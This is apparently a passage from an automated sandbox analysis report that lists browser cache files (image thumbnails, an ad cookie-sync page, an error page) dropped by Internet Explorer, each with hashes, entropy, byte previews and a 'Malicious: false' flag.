File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2083
Entropy (8bit):	7.78192823310018
Encrypted:	false
SSDEEP:	48:xGpuERAiyoqyEcndECGOBEnwfNTW/96B6PZ:xGAEdyohndECbNW/9COZ
MD5:	924F8F1B6623F2308AFA06DF1D8B5E43
SHA1:	582A6C41926000DF86F2610752847926F492E942
SHA-256:	328D08D10B68F407DD9A64A4B8284E92E4ABE6B1F9F8F7B5DFF928FA77E9CD71
SHA-512:	AC060ECCC91430DA79B1D0E2FA81F765190CC915438A7B8AE20C73EE731FE8DF1D93DFF0C086696C754D19CEDFB2DFA204B5E0093A8CDFC05F9529217122E1EE
Malicious:	false
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....t.....8Q.VsX^#...rB......RvD.]......#.1.\..p?>.ui...oq<G....".....-.i&a.l...>..,`...E....s.....C.........A...S.]......5Z.&I.H.......Y.r!c..4l...3f.Q.......q.G.?.......7C.`X......\|....K!.I.......$r!rr....1.......2161....y.^..,j..>G...G.[.$\|..a..wv5.......QT`!.Ph...j...=...TQ"...9.[-...........+. v.[.;.....a.+....a..5V;...#.F%\\|...F~.j.[..".K<.7.].......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cSOmi[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	6681
Entropy (8bit):	7.923096724098244
Encrypted:	false
SSDEEP:	96:BGAaE/q0Ftrw5CIHGYbcJrksl9q3y53DQf8BUb/Ix+Kn7EiChkIe1hiQfy2eeQPZ:BCS3rwmwerksl48E8+GEiChkViQq2ah
MD5:	4C45884B6F04C2111383EAEE0DC366FD
SHA1:	66AE1E1AED9C3A422611778805ECE3F17CEF2CF9
SHA-256:	4662B7F2AEE67E35108F0884FFC52A2FB7430EDE575F8285DCED22EB16BE4745
SHA-512:	B6D4120B5A87A1093319A417753A9AAF4FF7E3D748B3FE8BF871ED01D7592BE4226F517E0947FD2894CB095D5A552BEDC5DA45632126DD48B5EB5A21D5F3BF6E
Malicious:	false
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..../-v..x....L....p4w....s^4...h...EN+....G....T..a..6j\.+`f.\.p..D..q.....6._.}k..P.....w.A.. \.u..k...f1.H..rH.1gvv=...R...c......m...O. .......K.o..1<..B...x.V#..4....2}*9...ACw.........qZ......=...4..w.D......b..I<..D...\.U.hiX..=...]q.7..,.[.)..WbMS%....Rf...$8..Z..._...Q..W4......`da4...........a.a.".b.......)I....).dj..Vl..9../.&.....x'.-u...(....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cSPWX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	8043
Entropy (8bit):	7.941501224183521
Encrypted:	false
SSDEEP:	192:BCB4p70kWsR88JxXctE96D2gENhEcYiOlqdk5Nc:k2yZwstE96D25PJkXc
MD5:	DE2F8C0CC711A7B447C5E21D7CB0FBDA
SHA1:	443119661DE1DA07E707C45B7960661BCA69A9B3
SHA-256:	93CDFEAB6F0D23A5077D2991635C3493A225CB2291CD205252F58F10919E7BF3
SHA-512:	E6005E7D6596E230016FECE2D825666AD15246D1E142B2070647BF29105A7283835853027DF9AF5481D65CEE1DFD5991FDF8A9B42CC0BFC6444B4F6E53506140
Malicious:	false
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......4.0i.^..F1.Z..^MO...w-FjUlqP!.......o.F.zu..=x..#du..R.F..5..:........2#/..#....;.{T7.....vw..2...5...A..[.$fE.....-N........d..kq=...)c.....p.r.X..%..K.\v...B..0..V.t".C.[%.H.X.H/.U`..4#...L....W.....7.3.#.1.....u%..0p....5B.d,..^.....s.(..SW.3z..g...u.T.NU.V..o.H'$....f...\|..}.1......Eql!..c8O.=t.N...E2C...E#......%..J..j..ZE......Z.o.....[kRe...yf..S...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cSv9s[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	9845
Entropy (8bit):	7.922570792318985
Encrypted:	false
SSDEEP:	192:BY6636gxDbkfhnitD2ZJkfd+dSrYqlZWDaJIMBG2ONSty:e66qLhTcbiaSMBHONSc
MD5:	540EF696EC47BAD594755DBDAA320EAB
SHA1:	AEA56EC167F762796C5EF90ED82CB7F9A1CD7136
SHA-256:	9AB97424FAE49524EF109085EBBEADC265A3E604BE715A62966DD1B0DD0D8E5F
SHA-512:	E357DA4FFCFCE54B310777F435CF675441740A9BC31635FE2C3F84360AB305367DFE0CF8EC153023D5E9BD5D8BC2B5474DBE2D4DA60E058F43DB63FA388FD818
Malicious:	false
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..V.V2..Q.I,..M..V....`#.=.k..f...$.5(q".T......Z.V.[..).....M.#....ep).<.h...K.U...S.'.W6Q...\|.)B..k`.'.R..]4..X......&.A..9n.0......$KT.fE...{...f.H.CN....Rz.x...M.U[.F..U.DUke(J....<......S......se.].T..J_&.ytl..~M.M\..=.R..._..M&...w...y$.S...Z..[.V.Q..hw6..>..l......W(r.c+...K.......).}.D.tEN.DAE_.{Q@.{.a..:.}..eo..J.!...n.....`rz.....Z..T..]L.-l7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	396
Entropy (8bit):	6.789155851158018
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
MD5:	6D4A6F49A9B752ED252A81E201B7DB38
SHA1:	765E36638581717C254DB61456060B5A3103863A
SHA-256:	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
SHA-512:	34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc\|. ..?...\|.UA....GP.`\|. ......E...b.....&.>..x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.\|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	482
Entropy (8bit):	7.256101581196474
Encrypted:	false
SSDEEP:	12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
MD5:	307888C0F03ED874ED5C1D0988888311
SHA1:	D6FB271D70665455A0928A93D2ABD9D9C0F4E309
SHA-256:	D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
SHA-512:	6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.3. .!..p..,.c.>.\<H.0....,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.\|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	458
Entropy (8bit):	7.172312008412332
Encrypted:	false
SSDEEP:	12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
MD5:	A4F438CAD14E0E2CA9EEC23174BBD16A
SHA1:	41FC65053363E0EEE16DD286C60BEDE6698D96B3
SHA-256:	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
SHA-512:	FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..$Mf..j.n.~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T..Z_..'.}..rc....(...9V.&.....\|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..\|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	444
Entropy (8bit):	7.25373742182796
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
MD5:	D02BB2168E72B702ECDD93BF868B4190
SHA1:	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
SHA-256:	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
SHA-512:	6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBkwUr[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	431
Entropy (8bit):	7.092776502566883
Encrypted:	false
SSDEEP:	12:6v/78/kFkUgT6V0UnwQYst4azG487XqYsT:YgTA0UnwMM487XqZT
MD5:	D59ADB8423B8A56097C2AE6CBEDBEC57
SHA1:	CAFB3A8ABA2423C99C218C298C28774857BEBB46
SHA-256:	4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
SHA-512:	34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....DIDAT8O..M.EA...sad&V l.o.b.X..........O,.+..D....8_u.N.y.$......5.E..D.......@...A.2.....!..7.X.w..H.../..W2.....".......c.Q......x+f..w.H.`...1...J.....~'.{z)fj...`I.W.M..(.!..&E..b...8.1w.U...K.O,.....1...D.C..J....a..2P.9.j.@.......4l....Kg6.....#........g....n.>.p.....Q........h1.g .qA\..A..L .\|ED...>h....#....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.298160305572905
Encrypted:	false
SSDEEP:	384:PF8AGm6ElzD7XzeMk/lg2f5vzBgF3OZOQtQWwY4RXrqt:9SEJDnci2RmF3OsQtQWwY4RXrqt
MD5:	5B2D766D584BA7533F11EDCFD4E41294
SHA1:	27864FF83922B20C28E1A28AA81D3D4CBF08A378
SHA-256:	B8390B7FC30203272A4D556451A29D2B39A3F87AADC939D564E7D8861271A966
SHA-512:	EACEB2DE3057B61E6A62B463306A22334F8B5201C7B3336066B0390A2A426EDDFD0DBC9FFA81CDCE95BCEB18D40D868BAA08E8BECA3A65F36AD623943AA6AA68
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.298160305572905
Encrypted:	false
SSDEEP:	384:PF8AGm6ElzD7XzeMk/lg2f5vzBgF3OZOQtQWwY4RXrqt:9SEJDnci2RmF3OsQtQWwY4RXrqt
MD5:	5B2D766D584BA7533F11EDCFD4E41294
SHA1:	27864FF83922B20C28E1A28AA81D3D4CBF08A378
SHA-256:	B8390B7FC30203272A4D556451A29D2B39A3F87AADC939D564E7D8861271A966
SHA-512:	EACEB2DE3057B61E6A62B463306A22334F8B5201C7B3336066B0390A2A426EDDFD0DBC9FFA81CDCE95BCEB18D40D868BAA08E8BECA3A65F36AD623943AA6AA68
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_IBK_542734683__zTLH6vUV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	dropped
Size (bytes):	10756
Entropy (8bit):	7.874559132162376
Encrypted:	false
SSDEEP:	192:7GTO3wp9l4oI1TRI+K1M7FVm5jlzvos0FhWTD91+yiqFx3k3F7HZqTrf8j:KTOAp39I1T++G0Ql8smgDfpFG3x56fO
MD5:	530961F46738BB75E8A8C20EF3AC7B8B
SHA1:	55700ED468D4224871D9A0036CFEA0A82BFEAB2C
SHA-256:	6B99E6FDA79FFB376A6933803895517BFA1ECCCC159F7D9ABAC0D9E300CF06E4
SHA-512:	487F1A8AC644944E5AD87768743955FFAC05DE23A4F9F6C3C0D6BF28EBB601695407112C55386418DBFBE1C554828E981B32AA58AF7190D9DAE1363D0D3B015C
Malicious:	false
Preview:	......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.....................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........3...............................................................Q.N.(......J....Ic.A$.'_....h.a..5..Ug..J(:....(.}.=...i.)&.H{.DA$.".....l..o.k..}E)lt.,....8..+.X.l../iG,..)e.8{.DC$.".np0L..&...ib6..R..\M%...`.#-..d^.3.7r..IQ..H.......6..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_f48143b78e9b3762cecc24667fb146d7[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	dropped
Size (bytes):	25259
Entropy (8bit):	7.981091144282016
Encrypted:	false
SSDEEP:	768:8vCO7XRrPWbSz7w6A/V97G2V4zVmGDAG7:8vC25PWbSz7wLV9LYvAG7
MD5:	DD4D4A2F1A5A0FD90D4A5C83B26DED23
SHA1:	94D27DA87E5FB920B2DBC9B8B8F461388C7A2E69
SHA-256:	F9484C1B895EDA176F24DD771EDE356E111BF04B9910020F1488FFDA4E5714C3
SHA-512:	939645E136A5C42D50BB8374BCC7E740E850C40C0CAB7CDBA9A42F3E616C6BBE4B106BA1CBFCC444792B440031958FA2C93BC22931663E5D967C181CE9728636
Malicious:	false
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........4.................................................................HI!R...s....3db...e...T..1G....n-...l;rL..lI!$....K....Z..,H.Bn...'..:.v.....0..H!.o.u.....u.Rk..%I$....XU....MI..%.......0..%. ...H.....p^.?.>.q..}I*I...9X.^....>K...<.;.....jj.).f......%...~..9.]\.q.R.;]S...%J.X.nKX....Ol.T...d]...$.m..gwF..<...........\|.;...W ........."....x..._.P+!#...D..9C.. ot.....:`.,...X.4..f&~.i..Z.. =......4./T..e...#....X...d.GI..J.$3.<o.F.kQ......P.....5.B_!.$OPrH..<.T......"r...'T..[..8.$..z9..z......O/;...`5.......\|7..Y.+...S$..f...h.&.`....m.U_.d..V.GS.. ..k(.@ZH..83+T..P..XM...e.$\J.`....!.........7.e;....J....S.=-R.U.....&...$. .+`..Q......Vu..z.I.T.,.;.6...+ #.F.}...C...s.ct.......x.p...W....K...X??Vt(.k.(....f}........z.F!..Z.\krxc[;A..m...!#.......c4...&ME......M5..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nrrV63415[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	88151
Entropy (8bit):	5.422933393659934
Encrypted:	false
SSDEEP:	1536:DVnCuukXGsQihGZFu94xdV2E4535nJy0ukWaacUvP+i/TX6Y+fj4/fhAaTZae:DQiYpdVG7tubpKY+fjwZ
MD5:	58A026779C60669E6C3887D01CFD1D80
SHA1:	FBD57BDE06C3D832CC3CB10534E22DCFC7122726
SHA-256:	E4F1EDDBAD7B7F149B602330BD1D05299C3EB9F3ECB4ABD5694D02025A9559C9
SHA-512:	263AD21199F2F5EB3EF592E80D9D0BD898DED3FAFFDD14C34B1D5641D0ABD62FB03F0A738B88681FB3B65B5C698B5D6294DD0D8EAAED9E102B50B9D1DB6E6E8F
